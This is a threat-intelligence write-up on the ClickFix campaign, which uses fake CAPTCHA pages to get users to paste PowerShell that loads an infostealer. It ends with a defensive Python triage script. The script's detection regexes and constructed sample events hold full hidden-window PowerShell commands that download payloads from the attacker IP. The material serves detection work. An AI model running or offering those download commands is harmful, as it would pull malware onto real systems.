A new malware campaign, dubbed ClickFix, is emerging in early 2026, employing sophisticated social engineering tactics that utilize fake CAPTCHA verification pages to trick users into executing malicious commands. This campaign exhibits significant behavioral similarities to a previously observed ClickFix campaign targeting restaurant reservation systems in July 2025, indicating a refinement of the attackers’ methods to bypass traditional security defenses and gain initial access to victim systems.
The attack chain begins when a user visits a compromised website that displays a deceptive CAPTCHA challenge. Instead of providing a security verification, this fake CAPTCHA prompts the victim to copy a malicious PowerShell command to their clipboard and then manually execute it. This “ClickFix” technique is designed to circumvent automated security sandboxes, which typically analyze downloaded files but may overlook manually executed commands. The malware then reads the clipboard to confirm the user’s action before proceeding with the infection process.
ClickFix Infostealer Campaign Leverages Fake CAPTCHAs for Initial Access
Following manual execution of the deceptive command, the malware initiates a download from the attacker’s infrastructure, identified by the IP address 91.92.240.219. This downloaded malicious script then begins a multi-stage infection process aimed at stealing sensitive data. The scope of the targeted information is broad, encompassing credentials from over twenty-five web browsers, popular cryptocurrency wallets like MetaMask, and enterprise Virtual Private Network (VPN) configurations. Cyber Proof analysts noted that this campaign includes checks for virtual environments and active security tools before attempting to exfiltrate data.
The impact of such a compromise can be severe, granting attackers access to critical credentials and financial assets. This can enable them to monetize compromised accounts or use the initial foothold to move laterally within corporate networks, potentially leading to more extensive data breaches.
Process Injection and Persistence Mechanisms of ClickFix Malware
The ClickFix malware employs advanced techniques for process injection to maintain stealth on infected devices. After the initial PowerShell execution, it downloads a position-independent shellcode file, often named cptch.bin, from the attacker’s infrastructure. Analysts also observed an operational security oversight where the attacker utilized a variable named $finalPayload, which was flagged by Microsoft Defender. This shellcode, generated using the Donut framework, allows the payload to execute directly in memory, evading static analysis.
To conceal its malicious activities, the shellcode allocates memory within legitimate, benign processes such as svchost.exe by utilizing standard Windows APIs like VirtualAlloc. This injection technique makes it difficult for security software to distinguish between legitimate and malicious code running on the system.
To ensure the infection persists through system reboots, the attackers modify the RunMRU registry key. This modification ensures that the malicious PowerShell command is re-executed upon startup, re-initiating the payload download. This persistence mechanism is crucial for the attackers to maintain long-term access to the compromised system without requiring repeated manual intervention or exploitation of new vulnerabilities.
The ClickFix operators also employ tactics to bypass hash-based blocking mechanisms by rotating payload filenames, such as using cptchbuild.bin. This constant variation in filenames makes it challenging for security solutions to rely solely on file hashes for detection and blocking.
Organizations are advised to educate users about the inherent risks associated with running commands copied directly from web pages. Security teams should implement robust monitoring for unusual PowerShell execution patterns and specific registry modifications, particularly within areas known for persistence mechanisms. Furthermore, developing and implementing endpoint detection rules that flag unusual clipboard data access by browser processes could significantly aid in the early identification of this type of attack.
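The monitoring that the advice above calls for (unusual PowerShell execution, and modifications in registry areas used for persistence such as the RunMRU key) is easiest to reason about as a small scoring routine. The Python below is an added example written for this article; it is not CyberProof's tooling or code from the campaign. The only indicators it takes from the article are the download host 91.92.240.219, the rotated payload names cptch.bin and cptchbuild.bin, the $finalPayload variable name and the RunMRU key; the scoring weights, the regexes, the sample process-creation events and the sample `reg export` text are all assumptions constructed here. It scores command lines by behaviour (download cradle, hidden-window and bypass flags, IP-literal URL) rather than by file hash, which is the point of the filename rotation described earlier, and it gives one extra point when PowerShell is a child of explorer.exe, since that is how a command pasted into the Win+R Run dialog shows up in process telemetry.

```python
"""ClickFix triage helpers (example added to this article; not CyberProof's code).
Indicators from the article: host 91.92.240.219, payload names cptch*.bin, the
$finalPayload variable, the RunMRU key. Weights, regexes and samples are constructed."""
import re
from dataclasses import dataclass

KNOWN_HOSTS = {"91.92.240.219"}                        # download host named in the article
PAYLOAD_NAME_RE = re.compile(r"cptch\w*\.bin", re.I)   # cptch.bin, cptchbuild.bin, ...
OPSEC_SLIP_RE = re.compile(r"\$finalPayload", re.I)    # variable name flagged by Defender
DOWNLOAD_CRADLE_RE = re.compile(                       # generic heuristics (assumed)
    r"\b(?:iwr|irm|invoke-webrequest|invoke-restmethod|downloadstring|downloadfile"
    r"|net\.webclient|start-bitstransfer|curl|wget)\b", re.I)
EVASION_FLAG_RE = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|nop(?:rofile)?|noni(?:nteractive)?"
    r"|e(?:xecutionpolicy|p)\s+bypass|enc(?:odedcommand)?)\b", re.I)
IP_URL_RE = re.compile(r"https?://(\d{1,3}(?:\.\d{1,3}){3})", re.I)
POWERSHELL_IMAGE_RE = re.compile(r"(?:^|\\)(?:powershell|pwsh)(?:\.exe)?$", re.I)


def score_command(cmdline: str) -> tuple[int, list[str]]:
    """Score one command line; higher is more ClickFix-like. Returns (score, reasons)."""
    score, reasons = 0, []
    if DOWNLOAD_CRADLE_RE.search(cmdline):
        score += 2; reasons.append("download cradle")
    if EVASION_FLAG_RE.search(cmdline):
        score += 1; reasons.append("hidden-window/bypass flag")
    m = IP_URL_RE.search(cmdline)
    if m:
        score += 1; reasons.append("ip-literal url")
        if m.group(1) in KNOWN_HOSTS:
            score += 3; reasons.append(f"known host {m.group(1)}")
    if PAYLOAD_NAME_RE.search(cmdline):
        score += 2; reasons.append("cptch*.bin payload name")
    if OPSEC_SLIP_RE.search(cmdline):
        score += 2; reasons.append("$finalPayload variable")
    return score, reasons


@dataclass
class ProcEvent:  # minimal process-creation record (Sysmon event 1 / Security 4688 fields)
    image: str
    parent_image: str
    command_line: str


def triage_event(ev: ProcEvent) -> tuple[int, list[str]]:
    """Command-line score plus one point when PowerShell is a child of explorer.exe,
    which is what a command pasted into the Win+R Run dialog looks like."""
    score, reasons = score_command(ev.command_line)
    if POWERSHELL_IMAGE_RE.search(ev.image) and ev.parent_image.lower().endswith("explorer.exe"):
        score += 1; reasons.append("powershell spawned by explorer.exe")
    return score, reasons


def triage_events(events: list[ProcEvent], threshold: int = 3) -> list[dict]:
    scored = ((ev, *triage_event(ev)) for ev in events)
    return [{"command": ev.command_line, "score": s, "reasons": r} for ev, s, r in scored if s >= threshold]


_REG_VALUE_RE = re.compile(r'^"([^"]+)"="(.*)"$')


def parse_runmru_export(reg_text: str) -> list[tuple[str, str]]:
    """Parse `reg export` text of HKCU\\...\\Explorer\\RunMRU into (slot, command) pairs,
    most recent first per MRUList, with the trailing '\\1' marker Windows appends removed."""
    values = {}
    for line in reg_text.splitlines():
        m = _REG_VALUE_RE.match(line.strip())
        if m:                                   # .reg escapes '\' and '"' with a backslash
            values[m.group(1)] = re.sub(r"\\(.)", r"\1", m.group(2))
    order = values.pop("MRUList", "")
    entries = []
    for slot in order:
        cmd = values.get(slot)
        if cmd is not None:
            entries.append((slot, cmd[:-2] if cmd.endswith("\\1") else cmd))
    return entries


def find_suspicious_runmru(reg_text: str, threshold: int = 3) -> list[dict]:
    hits = []
    for slot, cmd in parse_runmru_export(reg_text):
        score, reasons = score_command(cmd)
        if score >= threshold:
            hits.append({"slot": slot, "command": cmd, "score": score, "reasons": reasons})
    return hits


# Constructed sample telemetry, not real captures.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\explorer.exe",
              'powershell -w hidden -nop -c "iwr http://91.92.240.219/cptchbuild.bin -OutFile $env:TEMP\\cptchbuild.bin"'),
    ProcEvent(r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe", r"C:\Windows\System32\svchost.exe",
              "powershell -NoProfile -File C:\\Scripts\\inventory.ps1"),   # benign scheduled script
]
SAMPLE_RUNMRU_REG = r'''Windows Registry Editor Version 5.00
[HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU]
"a"="notepad\\1"
"b"="powershell -w hidden -c \"$finalPayload='cptch.bin'; iwr http://91.92.240.219/$finalPayload\"\\1"
"MRUList"="ba"
'''

if __name__ == "__main__":
    for h in triage_events(SAMPLE_EVENTS) + find_suspicious_runmru(SAMPLE_RUNMRU_REG):
        print(f"score={h['score']:2d}  {', '.join(h['reasons'])}\n   {h['command']}")
```

The threshold of 3 is deliberately above the single point that a legitimate `-NoProfile` script earns, so the benign scheduled task in the sample is not reported while the pasted Run-dialog command and the RunMRU entry both are; in production the `ProcEvent` records would come from the EDR or Sysmon pipeline and the `.reg` text from `reg export` on the host being examined.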